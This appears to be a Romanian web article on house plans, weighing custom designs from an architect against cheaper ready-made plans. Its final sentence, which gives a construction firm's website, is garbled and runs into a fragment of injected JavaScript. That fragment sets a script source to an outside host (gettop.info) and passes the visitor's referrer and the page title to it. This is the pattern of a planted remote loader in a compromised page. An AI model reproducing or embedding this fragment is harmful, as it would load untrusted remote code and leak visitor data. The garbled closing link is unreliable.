proiecte de casa

proiecte de casa

Atunci cand va hotarati sa va construiti o locuinta, prima data va trebui sa stabiliti cum va arata aceasta si ce dimensiuni va avea. Prin urmare, veti avea nevoie de un proiect de casa, insa nu stiti cum sa il obtineti? Ei bine, aveti doua solutii. Prima este sa apelati la serviciile unui arhitect, iar acesta o sa va realizeze unul sau mai multe proiecte de case care sa respecte cerintele si exigentele dumneavoastra. Acesta este un proiect personalizat pentru ca este facut special pentru dumneavoastra si ia in considerare toate nevoile familiei. Cea de-a doua varianta este sa cautati proiecte de case gata facute si dintre acestea sa il alegeti pe cel care va place cel mai mult, dar care se potriveste si cu bugetul si cerintele dumneavoastra.

Proiecte de case facute de arhitect

Daca veti merge la un arhitec veti avea mai multe beneficii. In primul rand acesta este specializat in proiecte de casa, ceea ce inseamna ca este expert in domeniu si stie exact care sunt caracteristicile unei locuinte. In plus, el poate sa va ofere si cateva informatii cu privire la actele si documentatia de care veti avea nevoie pentru a obtine aprobarile necesare demararii constuctiei. De asemenea, un arhitect poate sa va ofere sugestii si in privinta constructorului, pentru ca acesta colaboreaza frecvent cu firmele de constructii, iar daca doriti poate supraveghea si modul in care sunt realizate lucrarile de constructie, astfel incat sa aveti certitudinea si siguranta unor lucrari bine facute, care respecta toate normele.

Dezavantajul acestor tipuri de proiecte de case este ca sunt putin mai scumpe si necesita mai mult timp si mai multa implicare din partea dumneavoastra, pentru ca trebuie sa va intalniti de mai multe ori cu arhitectul, pentru a stabili toate detaliile in legatura cu viitoare constructie.

Proiecte de case gata facute

Aceasta varianta prin care sa va alegeti modelul dorit din mai multe oferte de proiecte de case este ceva mai rapida, insa trebuie sa aveti in vedere ca optati pentru un lucru gata facut, adica este ceva mai putin personalizat, dar daca nu sunteti foarte pretentios si nu este o lucrare prea sofisticata analizarea unor proiecte de case gata facute poate fi o alegere chiar potrivita.

In plus, aceste proiecte de case sunt mai ieftine, pentru ca arhitectul care le realizeaza nu trebuie sa mai piarda atat de mult timp sa se intalneasca cu dumneavoastra si sa creeze o lucrare care sa respecte intocmai cerintele pe care le aveti. Acesta poate sa va prezinte chiar proiecte de case pe care le-a mai vandut si altor clienti, iar in acest caz veti avea posibilitatea sa vedeti real cum arata locuinta respectiva si sa va dati seama daca este sau nu ceea ce cautati.

Prin urmare, atunci cand sunteti in cautare de proiecte de case, trebuie sa va ganditi daca vreti o constructie personalizata sau pur si simplu aveti nevoie de niste sugestii si v-ar ajuta mai mult sa vedeti direct cum arata niste proiecte de case gata realizate.

Pentru mai multe detalii accesati site-ulĀ www.crihan-Construct.ros.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;